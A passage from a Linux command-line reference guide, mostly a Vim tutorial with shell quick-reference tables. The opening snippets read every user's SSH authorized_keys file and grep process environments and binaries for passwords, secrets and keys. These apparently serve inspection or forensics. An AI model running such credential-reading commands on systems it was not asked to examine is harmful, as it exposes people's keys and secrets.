find /home -name "authorized_keys" 2>/dev/null | xargs -I {} sh -c 'echo "=== {} ===" && cat {}'

# Process network connections
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
    name=$(cat /proc/$pid/comm 2>/dev/null)
    fd_count=$(ls /proc/$pid/fd 2>/dev/null | wc -l)
    if [ "$fd_count" -gt 10 ]; then
        echo "$pid ($name): $fd_count file descriptors"
    fi
done

# Scan process environments for secrets (/proc/PID/maps only lists mappings,
# not memory contents; environ is NUL-delimited, hence the tr)
for pid in $(pgrep -f "target_process"); do
    cat /proc/$pid/environ 2>/dev/null | tr '\0' '\n' | grep -E "password|secret|key"
done

13.4. Data Extraction

# Extract all IPs from any file
grep -oE "([0-9]{1,3}\.){3}[0-9]{1,3}" file | sort -u

# Extract all URLs
grep -oE "https?://[^\"'<>[:space:]]+" file | sort -u

# Extract all email addresses
grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" file | sort -u

# Extract domains from URLs
grep -oE "https?://[^/]+" file | sed 's|https\?://||' | sort -u

# Extract base64-encoded strings
grep -oE "[A-Za-z0-9+/]{20,}={0,2}" file | while read b64; do
    echo "=== $b64 ===" && echo "$b64" | base64 -d 2>/dev/null
done
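Round-tripping a known string shows the shape such matches take (the `2>/dev/null` in the loop above exists because most long alphanumeric runs are not actually valid base64):

```shell
b64=$(printf 'hello world!!' | base64)
echo "$b64"               # aGVsbG8gd29ybGQhIQ==
echo "$b64" | base64 -d   # hello world!!
```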

# Hex dump with ASCII
xxd file | head -50

# Extract printable strings from binary
strings -n 8 binary_file | grep -i "password\|secret\|key"

14. Vim: Editor Mastery

Vim is not optional. It’s the language your terminal speaks.

14.1. Registers: The Clipboard System

Register   Description
"          Default register (last delete/yank)
0          Yank register (last yank only, not affected by delete)
1-9        Delete history (1 = most recent)
_          Black hole register (discards text)
+          System clipboard
*          Primary selection (X11)
a-z        Named registers (you control these)
/          Last search pattern
:          Last command
.          Last inserted text

14.2. Black Hole Register: Preserve Your Buffer

The most useful intermediate technique - delete/change without overwriting your clipboard.

"_dd        " Delete line to black hole (preserves registers)
"_diw       " Delete inner word to black hole
"_ci"       " Change inside quotes to black hole, then paste with Ctrl+R 0
"_c$        " Change to end of line to black hole
"_x         " Delete char to black hole

14.2.1. Replace Inside Quotes (Preserve Paste Buffer)

"_ci"<Ctrl+R>0

  1. "_ci" - change inside quotes, sending the deleted text to the black hole

  2. <Ctrl+R>0 - while in insert mode, paste from the yank register

14.3. Text Objects: Precision Editing

Object    Description
iw / aw   inner word / a word (with surrounding space)
is / as   inner sentence / a sentence
ip / ap   inner paragraph / a paragraph
i" / a"   inner quotes / including quotes
i' / a'   inner single quotes / including quotes
i) / a)   inner parens / including parens
i] / a]   inner brackets / including brackets
i} / a}   inner braces / including braces
it / at   inner tag / including tags (HTML/XML)
i> / a>   inner angle brackets / including brackets

14.3.1. Text Object Combinations

ciw         " Change inner word
dap         " Delete paragraph
yi"         " Yank inside quotes
va}         " Visual select around braces
dit         " Delete inner tag content
cat         " Change around tag (including tags)

14.4. Motions: Navigate at Thought Speed

" Word motions
w           " Next word start
W           " Next WORD start (space-delimited)
b           " Previous word start
e           " Word end
ge          " Previous word end

" Line motions
0           " Line start
^           " First non-blank char
$           " Line end
g_          " Last non-blank char

" Search motions
f{char}     " Forward to char
F{char}     " Backward to char
t{char}     " Forward until char (stop before)
T{char}     " Backward until char
;           " Repeat f/t forward
,           " Repeat f/t backward

" Search patterns
/{pattern}  " Search forward
?{pattern}  " Search backward
*           " Search word under cursor (forward)
#           " Search word under cursor (backward)
n           " Next match
N           " Previous match

" Paragraph/block
{           " Previous blank line
}           " Next blank line
%           " Matching bracket

14.5. Operators + Motions = Power

" Operator + Motion
d$          " Delete to end of line
c/foo       " Change until 'foo'
y2}         " Yank 2 paragraphs
gUiw        " Uppercase inner word
gqip        " Format paragraph

" Operator + Text Object
ci(         " Change inside parens
da"         " Delete around quotes
yis         " Yank inner sentence
>i}         " Indent inside braces

" Operator + Count + Motion
d3w         " Delete 3 words
c2f)        " Change to 2nd closing paren
y5j         " Yank 6 lines (current line + 5 below)

14.6. Macros: Automate Repetition

qa          " Start recording to register 'a'
q           " Stop recording
@a          " Play macro 'a'
@@          " Repeat last macro
5@a         " Play macro 'a' 5 times

" Edit macro in register
"ap         " Paste macro content onto a line
... edit ...
0"ay$       " Yank edited line back to register 'a' ($ excludes the newline)

14.6.1. Macro Pattern: Apply to All Matches

" Record macro on first match (don't record 'n' — :g positions
" the cursor on each matching line for you)
qq          " Start recording to q
... edits ...
q           " Stop recording

" Apply to all matching lines
:g/pattern/normal @q

14.7. Visual Mode: Select Then Act

v           " Character visual
V           " Line visual
<C-v>       " Block visual (column editing)
gv          " Reselect last visual selection
o           " Move to other end of selection

" Visual block operations
<C-v>       " Enter block mode
I           " Insert at start of each line
A           " Append at end of each line
c           " Change each line
r           " Replace each character

14.7.1. Block Mode: Multi-line Editing

<C-v>       " Start block select
3j          " Select down 3 lines
I           " Insert mode (block)
//          " Type comment prefix
<Esc>       " Apply to all lines

14.8. Marks: Bookmarks Within Files

ma          " Set mark 'a' at cursor
'a          " Jump to line of mark 'a'
`a          " Jump to exact position of mark 'a'
''          " Jump to previous position
``          " Jump to exact previous position

" Special marks
'.          " Last change
'^          " Last insert
'[  ']      " Start/end of last yank/change
'<  '>      " Start/end of last visual selection

14.9. Substitution: Find and Replace

" Basic substitution
:s/old/new/         " First occurrence on current line
:s/old/new/g        " All occurrences on current line
:%s/old/new/g       " All occurrences in file
:%s/old/new/gc      " All occurrences, confirm each

" Range substitution
:10,20s/old/new/g   " Lines 10-20
:'<,'>s/old/new/g   " Visual selection
:.,$s/old/new/g     " Current line to end

" Case handling
:%s/old/new/gi      " Case insensitive search
:%s/old/\U&/g       " Replace with uppercase
:%s/old/\L&/g       " Replace with lowercase

" Capture groups
:%s/\(\w\+\)/[\1]/g         " Wrap words in brackets
:%s/^\(.*\)$/"\1",/         " Add quotes and comma

" Magic/very magic
:%s/\v(\w+)/[\1]/g          " Very magic (extended regex)
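
On the shell side, the same capture-group substitutions translate almost directly to sed; a quick sketch, using the POSIX class `[[:alnum:]_]` in place of vim's `\w`:

```shell
# Wrap every word in brackets, like :%s/\(\w\+\)/[\1]/g
# ('&' in the replacement is the whole match)
echo "foo bar baz" | sed -E 's/[[:alnum:]_]+/[&]/g'
# [foo] [bar] [baz]

# Add quotes and a trailing comma, like :%s/^\(.*\)$/"\1",/
echo "hello" | sed -E 's/^(.*)$/"\1",/'
# "hello",
```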

14.10. Command-line Mode Power

" Execute on pattern match
:g/pattern/d            " Delete all matching lines
:g/pattern/normal @q    " Run macro on matches
:v/pattern/d            " Delete non-matching lines (inverse)

" Execute shell command
:!command               " Run external command
:r !command             " Read command output into buffer
:w !command             " Write buffer to command stdin
:%!sort                 " Filter buffer through sort
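
The filter commands run the same programs you use in pipelines: `:%!sort` hands the buffer to standard `sort` on stdin and replaces it with the output, so its effect can be previewed outside vim:

```shell
# What :%!sort does to a buffer, reproduced as a pipeline
printf 'banana\napple\ncherry\n' | sort
# apple
# banana
# cherry

# :%!sort -u would also drop duplicate lines
printf 'b\na\nb\n' | sort -u
# a
# b
```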

" Ranges with patterns
:/start/,/end/d         " Delete between patterns
:/start/,/end/s/a/b/g   " Substitute between patterns

14.11. Window and Buffer Management

" Splits
<C-w>s      " Horizontal split
<C-w>v      " Vertical split
<C-w>q      " Close split
<C-w>o      " Close all other splits

" Navigation
<C-w>h/j/k/l    " Move between splits
<C-w>H/J/K/L    " Move split to edge
<C-w>=          " Equalize split sizes
<C-w>_          " Maximize height
<C-w>|          " Maximize width

" Buffers
:ls             " List buffers
:bn / :bp       " Next/previous buffer
:b{n}           " Go to buffer n
:bd             " Delete buffer

14.12. Insert Mode Shortcuts

<C-r>{reg}  " Insert from register
<C-r>=      " Insert expression result (calculator)
<C-a>       " Insert last inserted text
<C-w>       " Delete word before cursor
<C-u>       " Delete to start of line
<C-t>       " Indent current line
<C-d>       " Unindent current line
<C-n>       " Autocomplete (next match)
<C-p>       " Autocomplete (previous match)
<C-o>       " Execute one normal mode command

14.12.1. Insert Mode: Expression Register (Calculator)

<C-r>=2+2<Enter>        " Inserts 4
<C-r>=system('date')<Enter>    " Inserts current date (plus trailing newline)
<C-r>=expand('%')<Enter>       " Inserts filename

14.13. Advanced: Recording and Efficiency

14.13.1. Edit Existing File at Specific Line

vim +42 file.txt        # Open at line 42
vim +/pattern file.txt  # Open at first match
vim -c 'normal G' file  # Open at end of file

14.13.2. Open Multiple Files

vim -o file1 file2      # Horizontal splits
vim -O file1 file2      # Vertical splits
vim -p file1 file2      # Tabs

14.13.3. Diff Mode

vim -d file1 file2      # Open in diff mode

In vim:

]c          " Next difference
[c          " Previous difference
do          " Get diff from other window (obtain)
dp          " Put diff to other window

15. Quick Reference Tables

15.1. Exit Codes

Code    Meaning
0       Success
1       General error
2       Misuse of shell command
126     Permission denied (cannot execute)
127     Command not found
128+n   Fatal signal n (e.g., 130 = Ctrl+C)
255     Exit status out of range
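
These codes are easy to reproduce from a shell; a quick demonstration (the unknown command name here is made up, and mktemp provides a non-executable scratch file):

```shell
false; echo $?                              # 1: general error

no_such_command_xyz 2>/dev/null; echo $?    # 127: command not found

f=$(mktemp)                                 # mode 600 — not executable
"$f" 2>/dev/null; echo $?                   # 126: permission denied
rm -f "$f"

bash -c 'kill -TERM $$'; echo $?            # 143 = 128 + 15 (SIGTERM)
```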

15.2. Special Variables

Variable   Description
$?         Exit code of last command
$$         Current shell PID
$!         PID of last background process
$0         Script name
$1-$9      Positional parameters
$@         All parameters (separate words)
$*         All parameters (single word)
$#         Number of parameters
$_         Last argument of previous command
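
The `"$@"` vs `"$*"` distinction is easiest to see live; a small bash sketch, using `set --` to create positional parameters for illustration:

```shell
set -- one "two three"

echo "count: $#"                          # count: 2

for arg in "$@"; do echo "@: $arg"; done  # each parameter stays a separate word
# @: one
# @: two three

for arg in "$*"; do echo "*: $arg"; done  # all parameters joined into one word
# *: one two three
```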

15.3. Test Operators

File Tests          String Tests        Numeric Tests
-e  exists          -z  empty           -eq  equal
-f  is file         -n  not empty       -ne  not equal
-d  is directory    =   equal           -lt  less than
-r  readable        !=  not equal       -le  less or equal
-w  writable        <   less than       -gt  greater than
-x  executable      >   greater than    -ge  greater or equal
-s  size > 0
-L  is symlink

Note: string < and > compare lexicographically; inside [ ] they must be
escaped (\< \>) or they become redirections — [[ ]] avoids that.
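
A few of these operators combined into a runnable bash check (a mktemp scratch file stands in for a real one):

```shell
f=$(mktemp)                                 # scratch file for the file tests

[ -e "$f" ] && echo "exists"                # exists
[ -f "$f" ] && echo "regular file"          # regular file
[ -s "$f" ] || echo "size is 0"             # size is 0

[ -z "" ] && echo "empty string"            # empty string

[ 3 -lt 7 ] && echo "3 < 7"                 # 3 < 7

# [[ ]] lets < compare strings without escaping
[[ "apple" < "banana" ]] && echo "apple sorts first"   # apple sorts first

rm -f "$f"
```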

16. Resources and References

16.1. Books

  • The Linux Command Line - William Shotts (free PDF)

  • Classic Shell Scripting - O’Reilly

  • sed & awk - O’Reilly (the bible)

  • Wicked Cool Shell Scripts - No Starch Press

"The command line is a time machine. Learn it once, use it for 30 years."